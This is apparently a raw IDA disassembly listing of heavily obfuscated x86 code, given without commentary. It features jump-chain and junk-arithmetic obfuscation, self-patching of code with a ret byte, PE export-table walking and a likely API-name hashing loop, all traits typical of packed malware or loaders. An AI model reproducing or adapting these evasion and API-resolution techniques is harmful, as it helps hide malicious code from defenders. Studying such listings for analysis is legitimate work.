; FUNCTION CHUNK AT 004443D7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459EF4 SIZE 00000005 BYTES

		push	0F1E64BA1h
		pop	edx
		and	edx, 0F3AA1598h
		or	edx, 0D95B857Eh
		rol	edx, 1Eh
		jmp	loc_459EF4
sub_451E9F	endp

; ---------------------------------------------------------------------------

loc_451EB9:				; CODE XREF: hvvrg7ie:0043A1FAj
		push	offset sub_43DC44
		jmp	locret_444EE0
; ---------------------------------------------------------------------------
		xchg	ecx, eax
		jmp	loc_454F37
; ---------------------------------------------------------------------------

loc_451ECA:				; CODE XREF: hvvrg7ie:loc_457323j
		rol	ebx, 14h
		and	ebx, 63F19FE8h
		add	ebx, 0FF633231h
		push	offset sub_445ED6
		jmp	loc_4514CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_451EE3:				; CODE XREF: sub_43FC15:loc_443020j
		pushf
		jmp	loc_454323
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44440B

loc_451EE9:				; CODE XREF: sub_44440B:loc_43FB98j
		mov	byte ptr [eax],	0C3h
		call	nullsub_16

loc_451EF1:				; CODE XREF: hvvrg7ie:loc_44E632j
		push	ebx
		push	0E327BB44h
		xchg	edx, [esp+4+var_4]
		mov	ebx, edx
		pop	edx
		and	ebx, 454EA7FCh
		jmp	loc_43C93E
; END OF FUNCTION CHUNK	FOR sub_44440B
; ---------------------------------------------------------------------------
		push	ebp
		xor	ebp, ebx
		jmp	loc_44B088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_451F10:				; CODE XREF: sub_442FD1+10B33j
		push	5671BF87h
		xchg	edx, [esp+14h+var_14]
		mov	ebx, edx
		pop	edx
		add	ebx, 4575EE9Dh
		xor	ebx, 600B397Ah
		jnz	loc_44270D
; END OF FUNCTION CHUNK	FOR sub_442FD1
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_451F2D:				; CODE XREF: sub_44370F-64DAj
		jmp	loc_43B043
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_451F32:				; CODE XREF: sub_43C0DE-24DAj
		jmp	nullsub_397
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_451F37:				; CODE XREF: sub_43B7B9:loc_44136Dj
		jns	loc_457AF1
		not	esi
		sub	ecx, 48F35B01h
		jmp	loc_45170B
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------

loc_451F4A:				; CODE XREF: hvvrg7ie:00445FB3j
		jle	loc_45B0CB

; =============== S U B	R O U T	I N E =======================================



sub_451F50	proc near		; CODE XREF: sub_458095-18CCBp

; FUNCTION CHUNK AT 0043AD49 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E442 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446FF6 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044DDF7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004503B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A030 SIZE 00000011 BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_451F54:				; CODE XREF: hvvrg7ie:loc_453B5Aj
		movzx	eax, byte ptr [eax]
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		shl	eax, 0Ah
		jmp	loc_43E442
sub_451F50	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_451F65	proc near		; DATA XREF: sub_448881+E22Ao

; FUNCTION CHUNK AT 004499C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB42 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D46A SIZE 00000005 BYTES

		call	sub_447B07
		push	0E4C33096h
		pop	eax
		add	eax, 0A6FB9208h
		xor	eax, 2C7C91F2h
		call	sub_450C5A
		jmp	loc_44D46A
sub_451F65	endp

; ---------------------------------------------------------------------------
		push	881BA5Ch
		test	ebp, 633D42C6h
		jmp	loc_44E5EF
; ---------------------------------------------------------------------------
		xchg	ebx, [eax]
		or	ebp, esi
		jmp	sub_448A18
; ---------------------------------------------------------------------------

loc_451F9F:				; CODE XREF: hvvrg7ie:0043C96Fj
		mov	eax, [esp]
		push	edx
		push	offset sub_445F72
		jmp	locret_44E12A

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_451FAD	proc near		; CODE XREF: sub_44680C+4B60j
		retn
sub_451FAD	endp

; ---------------------------------------------------------------------------

loc_451FAE:				; CODE XREF: hvvrg7ie:00457F3Bj
		jmp	nullsub_190
; ---------------------------------------------------------------------------

loc_451FB3:				; CODE XREF: hvvrg7ie:00451940j
		jmp	locret_446121
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_451FB8:				; CODE XREF: sub_45889B:loc_43E32Aj
					; sub_44059F+1966Fj
		jz	loc_45AE82
		jmp	loc_44ACEC
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E86

loc_451FC3:				; CODE XREF: sub_453E86:loc_45A134j
		call	sub_452B83

loc_451FC8:				; CODE XREF: sub_453E08:loc_4500F5j
		jmp	loc_4430A0
; END OF FUNCTION CHUNK	FOR sub_453E86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_451FCD:				; CODE XREF: sub_45B048-18AF0j
		jmp	loc_444FE5
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE01

loc_451FD2:				; CODE XREF: sub_43DE01:loc_43DE21j
		push	edx
		push	459491CEh
		pop	edx
		and	edx, 1B80D2F9h
		jns	loc_458B37
; END OF FUNCTION CHUNK	FOR sub_43DE01
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_451FE5:				; CODE XREF: sub_44B69F+CD9Aj
		jmp	sub_4585EE
; END OF FUNCTION CHUNK	FOR sub_44B69F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_451FEA:				; CODE XREF: sub_440643+9E35j
					; hvvrg7ie:loc_44B77Dj
		jmp	loc_4533BF
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
		sub	edx, 4832CDBFh
		not	eax
		jmp	loc_458B37
; ---------------------------------------------------------------------------

loc_451FFC:				; CODE XREF: hvvrg7ie:00447A37j
		pushf

loc_451FFD:				; CODE XREF: hvvrg7ie:loc_447A28j
		call	sub_44C359
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_452002:				; CODE XREF: sub_44D47A+572Dj
		jmp	loc_4589E4
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B63C

loc_452007:				; CODE XREF: sub_43B63C+7j
		jmp	loc_44D789
; END OF FUNCTION CHUNK	FOR sub_43B63C

; =============== S U B	R O U T	I N E =======================================



sub_45200C	proc near		; DATA XREF: sub_4500FA-11C32o
		add	eax, 0BC57BCFh
		push	eax
		call	sub_43A87E
		push	edi
		call	sub_451B45

loc_45201E:				; CODE XREF: sub_439498+8j
		jmp	nullsub_151
sub_45200C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C8E0

loc_452023:				; CODE XREF: sub_43C8E0+E1B2j
		rol	ebp, 9
		jmp	loc_447CE9
; END OF FUNCTION CHUNK	FOR sub_43C8E0

; =============== S U B	R O U T	I N E =======================================



sub_45202B	proc near		; CODE XREF: hvvrg7ie:00448413p
					; sub_448FB0+FBB5p

; FUNCTION CHUNK AT 0043A1CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B8C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DDD1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004401B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044382C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00444E84 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446CF1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004470C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485BC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044909B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045320C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045435F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045677F SIZE 00000005 BYTES

		jno	sub_43EEA9
		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_44909B
sub_45202B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	edi, 98F0FE24h
		jmp	loc_44D8CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498FB

loc_452047:				; CODE XREF: sub_4498FB+E9DDj
		jz	loc_4528DC
		jmp	loc_4518C5
; END OF FUNCTION CHUNK	FOR sub_4498FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_452052:				; CODE XREF: sub_44E1C9:loc_43D746j
		jnz	loc_4429FF
		jmp	loc_44F381
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------

loc_45205D:				; DATA XREF: sub_459E78:loc_43F23Ao
		call	sub_45329F
		mov	eax, 0B98DBDD7h
		call	sub_450C5A
		push	ecx
		jmp	loc_459DFF
; ---------------------------------------------------------------------------

loc_452072:				; CODE XREF: hvvrg7ie:0043D670j
		add	edi, 0EF7590B6h
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_452078:				; CODE XREF: sub_450F97:loc_43D65Ej
		xor	edx, 75166044h
		and	edx, 54999778h
		add	edx, 0ABEFFF98h
		xchg	edx, [esp+4+var_4]
		push	4
		lea	eax, [ebp+var_10]
		jmp	loc_441654
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_452097:				; CODE XREF: sub_4544DD:loc_4578B4j
		jz	loc_44CD53

loc_45209D:				; CODE XREF: hvvrg7ie:004588D4j
		jmp	loc_43AE5E
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		cmp	esi, [ecx-27CC0001h]
		jno	loc_446461
		jmp	loc_45A211
; ---------------------------------------------------------------------------
		mov	[edx], edi
		jmp	loc_445405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_4520BC:				; CODE XREF: sub_44D149+E36Aj
		or	edi, 0BFCC2553h
; END OF FUNCTION CHUNK	FOR sub_44D149
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_4520C2:				; CODE XREF: sub_451E6D:loc_442A77j
					; sub_451E6D:loc_445C8Dj ...
		jmp	loc_455D0E
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_4520C7:				; CODE XREF: sub_451E6D-C179j
					; sub_44D149+5j
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_4520CF:				; CODE XREF: sub_43E063+AF00j
		jmp	loc_446C28
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_4520D4:				; CODE XREF: sub_43EB47:loc_458CA3j
		push	eax
		call	sub_439AE3
		push	edi
		mov	edi, eax
		jmp	loc_43C470
; END OF FUNCTION CHUNK	FOR sub_43EB47
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4520E3:				; CODE XREF: sub_45889B-14D29j
		push	0C64BF875h
		or	ecx, edx
		cmp	edx, ecx
		jmp	loc_4549B9
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_4520F1:				; CODE XREF: sub_44B7CB+E093j
		shl	eax, cl
		push	0A1710D36h
		pop	edx
		add	edx, 4146FBB3h
		jnb	loc_43CD62
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_452105:				; CODE XREF: sub_43F227+1717Bj
		rol	ebp, 6

loc_452108:				; CODE XREF: hvvrg7ie:00453D47j
		sbb	edx, 17E94F82h
		not	ebx
		jmp	loc_43EE58
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_452115:				; CODE XREF: hvvrg7ie:loc_45AD3Cj
		pop	edi
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_454E54
		mov	eax, 469EF90Dh
		jmp	loc_45B613
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589A2

loc_45212E:				; CODE XREF: sub_4589A2:loc_43D7BDj
		mov	eax, [eax]
		push	offset sub_44106C
		jmp	loc_44CE1D
; END OF FUNCTION CHUNK	FOR sub_4589A2
; ---------------------------------------------------------------------------

loc_45213A:				; CODE XREF: hvvrg7ie:loc_4591F9j
		cmp	ecx, 169B4018h
		jmp	loc_45477A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45943A

loc_452145:				; CODE XREF: sub_45943A:loc_457AFCj
					; DATA XREF: hvvrg7ie:loc_453F38o
		add	edx, 0D3802879h
		popf
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4430DE
; END OF FUNCTION CHUNK	FOR sub_45943A
; ---------------------------------------------------------------------------
		cmp	edx, ecx
		jmp	loc_456F99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448181

loc_45215B:				; CODE XREF: sub_448181:loc_44FCDFj
		pop	eax
		xor	eax, 0E875A441h
		add	eax, 0A3F4F5CAh
		rol	eax, 10h
		jnb	loc_43A009

loc_452171:				; DATA XREF: hvvrg7ie:00442ED5o
		xchg	ecx, [esp+4+var_4]
		jmp	loc_453BE7
; END OF FUNCTION CHUNK	FOR sub_448181
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_452179:				; CODE XREF: sub_43F227+2398j
					; sub_43F227:loc_44CF47j
		call	sub_459A10

loc_45217E:				; CODE XREF: hvvrg7ie:00450320j
		jmp	loc_45639C
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_452183:				; CODE XREF: sub_43A839+4D83j
		jmp	loc_44A822
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_452188:				; CODE XREF: sub_447E56:loc_44A4CFj
		push	edi
		push	0B77F3EEh
		pop	edi

loc_45218F:				; CODE XREF: hvvrg7ie:004490F3j
		and	edi, 87D250D3h
		rol	edi, 1Ch
		sub	edi, 25237E4Bh
		rol	edi, 1Fh
		jmp	loc_44807F
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_4521A6:				; CODE XREF: sub_43C0DE+1855j
		xchg	eax, [esi]
		jmp	loc_459D78
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4442B9

loc_4521AD:				; CODE XREF: sub_4442B9:loc_43B7ACj
		push	offset sub_44FA76
		jmp	nullsub_154
; END OF FUNCTION CHUNK	FOR sub_4442B9
; ---------------------------------------------------------------------------

loc_4521B7:				; DATA XREF: sub_43D052+Fo
		push	ecx
		push	6CADDB7Ch
		pop	ecx
		sub	ecx, 24FC5567h
		jmp	loc_44289E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_4521C9:				; CODE XREF: sub_450434:loc_43F3FFj
					; sub_450434:loc_444480j ...
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		pop	ebp
; END OF FUNCTION CHUNK	FOR sub_450434
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4521CF:				; CODE XREF: sub_43F227:loc_44FD26j
		jmp	loc_44AEDF
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_4521D4	proc near		; DATA XREF: sub_458A13:loc_445C63o

; FUNCTION CHUNK AT 0044A252 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B474 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FE81 SIZE 00000010 BYTES

		push	29B91DC1h
		pop	edx
		rol	edx, 0Dh
		jb	loc_44FE81

loc_4521E3:				; CODE XREF: sub_43D5FD+1DC5Fj
		jmp	loc_44B474
sub_4521D4	endp

; ---------------------------------------------------------------------------

loc_4521E8:				; CODE XREF: hvvrg7ie:loc_4526C9j
		popf
		jmp	loc_44FE7F
; ---------------------------------------------------------------------------
		mov	ds:off_41D10C, eax
		lea	eax, sub_457F50
		mov	byte ptr [eax],	0C3h
		jmp	loc_44865E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_452202:				; CODE XREF: sub_457F50j
		pop	edx
		mov	eax, [esp+0]
		push	edx
		nop
		mov	eax, 2867838Ah
		jmp	loc_43DCA4
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4398B7

loc_452212:				; CODE XREF: sub_445DF4:loc_449D8Ej
					; sub_4398B7+193CAj ...
		call	sub_4398B7
; END OF FUNCTION CHUNK	FOR sub_4398B7
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_452217:				; CODE XREF: sub_43B3BE+C638j
		jz	loc_43E43B
		jmp	loc_448038
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_452223:				; CODE XREF: sub_43D285+172A6j
		jmp	loc_45412C
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_452228:				; CODE XREF: hvvrg7ie:0044C84Bj
		jmp	locret_44AFA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_45222D:				; CODE XREF: sub_458F33-F136j
		jz	loc_457691
		jmp	loc_4459B6
; END OF FUNCTION CHUNK	FOR sub_458F33

; =============== S U B	R O U T	I N E =======================================



sub_452238	proc near		; CODE XREF: sub_43B3BE+307Fp
					; hvvrg7ie:004510F7j

; FUNCTION CHUNK AT 0043969E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448BFC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452815 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebp-0Ch], eax
		push	0ADBB1BE1h
		pop	eax
		add	eax, 76C34D97h
		jmp	loc_448BFC
sub_452238	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44432F

loc_452250:				; CODE XREF: sub_44432F:loc_439E43j
		rol	eax, 1

loc_452252:				; CODE XREF: hvvrg7ie:00450945j
		add	eax, 17E6091Ch
		add	eax, ebp
		add	eax, 0FE5C96DBh
		jmp	loc_44DE54
; END OF FUNCTION CHUNK	FOR sub_44432F

; =============== S U B	R O U T	I N E =======================================



sub_452265	proc near		; CODE XREF: sub_440AD9+826Cj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043A822 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D75 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446DD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044907E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E444 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453400 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045484E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E1D SIZE 0000000C BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+8+var_8]
		call	sub_43B248
		mov	[ebp-8], eax
		jmp	loc_453400
sub_452265	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_452278	proc near		; CODE XREF: hvvrg7ie:004543FCj
					; sub_43AB99:loc_458C81p
		xchg	eax, [esp+0]
		pop	eax

loc_45227C:				; CODE XREF: sub_44346F:loc_44A09Bj
		xor	esi, 0B96C31F4h
		xor	eax, esi
		pop	esi
		push	offset sub_44121E
		jmp	nullsub_155
sub_452278	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_45228F:				; CODE XREF: sub_44736C+3056j
		and	eax, 4E602303h
		add	eax, 0FE04307Ah
		xchg	eax, [esp+4+var_4]
		jmp	loc_44735B
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AAE4

loc_4522A3:				; CODE XREF: sub_43AAE4:loc_43E6CCj
		and	ecx, 5EFCBD66h
		rol	ecx, 1Eh
		sub	ecx, 38A4F37Ah
		rol	ecx, 1Eh
		xor	ecx, 3635936Eh
		add	ecx, ebp
		add	ecx, 7B8FA255h
		jmp	loc_44372B
; END OF FUNCTION CHUNK	FOR sub_43AAE4
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_4453E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_4522CE:				; CODE XREF: sub_453EFC:loc_4527FBj
		jge	loc_4505ED

loc_4522D4:				; CODE XREF: hvvrg7ie:00447BA1j
		jmp	nullsub_484
; END OF FUNCTION CHUNK	FOR sub_453EFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_4522D9:				; CODE XREF: sub_45038B-15CBAj
		jmp	loc_43C840
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		mov	ebp, 3FA9F302h
		jmp	loc_447632
; ---------------------------------------------------------------------------
		xor	ebx, 0C1DC4C74h
		ror	edx, 1Dh
		jmp	sub_459593
; ---------------------------------------------------------------------------

loc_4522F6:				; CODE XREF: hvvrg7ie:00445873j
		adc	edx, eax

; =============== S U B	R O U T	I N E =======================================



sub_4522F8	proc near		; CODE XREF: hvvrg7ie:004447C4p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A28D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043B5A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043D18A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00450DA3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045156B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045387C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045558F SIZE 0000001A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_44AEBA
		jmp	loc_43A28D
sub_4522F8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_452310:				; CODE XREF: sub_45ACF1-2BF8j
		sbb	eax, ecx
		push	edx
		push	65B69076h
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_452318:				; CODE XREF: sub_456A52:loc_43EAC1j
		pop	edx
		jmp	loc_447F51
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		dw 3373h
dword_452320	dd 0F9E7241Dh		; DATA XREF: hvvrg7ie:00449841w
					; hvvrg7ie:00450312r
dword_452324	dd 0F729DF52h		; DATA XREF: hvvrg7ie:0044AED8w
					; sub_43F8AB+D273r
; ---------------------------------------------------------------------------

loc_452328:				; CODE XREF: hvvrg7ie:00449EE0j
		jmp	sub_448CCA
; ---------------------------------------------------------------------------

loc_45232D:				; CODE XREF: hvvrg7ie:00441CAAj
		jmp	locret_44AADA
; ---------------------------------------------------------------------------
		dw 0C8DAh
dword_452334	dd 0E1663BEAh		; DATA XREF: sub_4512BCw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451ADC

loc_452338:				; CODE XREF: sub_451ADC+11j
		jmp	nullsub_480
; END OF FUNCTION CHUNK	FOR sub_451ADC
; ---------------------------------------------------------------------------
		db 13h,	2Fh, 30h
dword_452340	dd 0C77DD609h		; DATA XREF: hvvrg7ie:loc_43D150w
					; sub_44C2EA+EDB3r
; ---------------------------------------------------------------------------

loc_452344:				; CODE XREF: hvvrg7ie:00444234j
		jmp	locret_4573EC
; ---------------------------------------------------------------------------
		xchg	eax, [ecx]
		add	eax, 15B83B47h
		jmp	sub_450EA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_452356:				; CODE XREF: sub_4500FA-151F5j
		jz	loc_44EE03
		jmp	loc_43E498
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------

locret_452361:				; CODE XREF: hvvrg7ie:loc_45826Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_452362:				; CODE XREF: sub_448100-E6EAj
		jmp	loc_4464BC
; END OF FUNCTION CHUNK	FOR sub_448100
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_452368:				; CODE XREF: sub_43C811+EEAAj
		jmp	loc_43DED4
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_45236D:				; CODE XREF: sub_43C290+68C7j
		jmp	loc_44E1FB
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_452372:				; CODE XREF: sub_43EBB6+C54Dj
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_45825B
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------
		sub	edi, ecx
		or	ebx, 602967D3h
		jmp	sub_43E60A
; ---------------------------------------------------------------------------

loc_45238F:				; CODE XREF: hvvrg7ie:00453992j
		push	eax
		cmp	ecx, ebp
		jmp	loc_444E9D
; ---------------------------------------------------------------------------
		mov	edx, [ebp+8]
		mov	eax, [edx]
		push	eax
		push	0B4BDB414h
		pop	eax
		sub	eax, 16086DC4h
		xor	eax, ds:4000F6h
		add	eax, 0E2ED5BC0h
		jmp	loc_450E90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B13

loc_4523BA:				; CODE XREF: sub_455B13-2B48j
		jg	loc_453C5E
		jmp	loc_458823
; END OF FUNCTION CHUNK	FOR sub_455B13
; ---------------------------------------------------------------------------

loc_4523C5:				; DATA XREF: sub_4478FE:loc_43C9ABo
		test	eax, edx
		pop	edx
		jz	loc_458ADD
		jmp	loc_458275

; =============== S U B	R O U T	I N E =======================================



sub_4523D3	proc near		; CODE XREF: sub_440C05:loc_43E6EAp
					; hvvrg7ie:0044F543j
		xchg	edx, [esp+0]
		pop	edx
		push	eax
		ror	eax, 10h
		mov	ds:dword_45A8AC, eax
		retn
sub_4523D3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4523E2:				; CODE XREF: sub_454099-FE03j
		jl	loc_44DE70
		test	eax, ebp
		jmp	loc_44DE67
; ---------------------------------------------------------------------------

loc_4523EF:				; CODE XREF: sub_454099-63D6j
		jnz	loc_4575F8
		jmp	loc_459DD3
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_4523FA:				; DATA XREF: sub_439873+2B71o
		or	ecx, ecx
		jz	loc_43BA03
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_43BA03
		call	sub_459CC4
		jnz	loc_43BA03
		jmp	loc_451007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_45241E:				; CODE XREF: sub_44398A-9F0Cj
		adc	eax, 144F980Dh
		sbb	edx, 0D72312C3h
		jnb	loc_43B574
		or	ebp, 0D9AF4698h
		jmp	loc_44EC5D
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
		shl	esi, 0Ah
		cdq
		jmp	sub_44290B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D2F

loc_452444:				; CODE XREF: sub_452D2F:loc_452D3Aj
		popf
		xchg	esi, [esp-4+arg_0]
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_452D2F
; ---------------------------------------------------------------------------

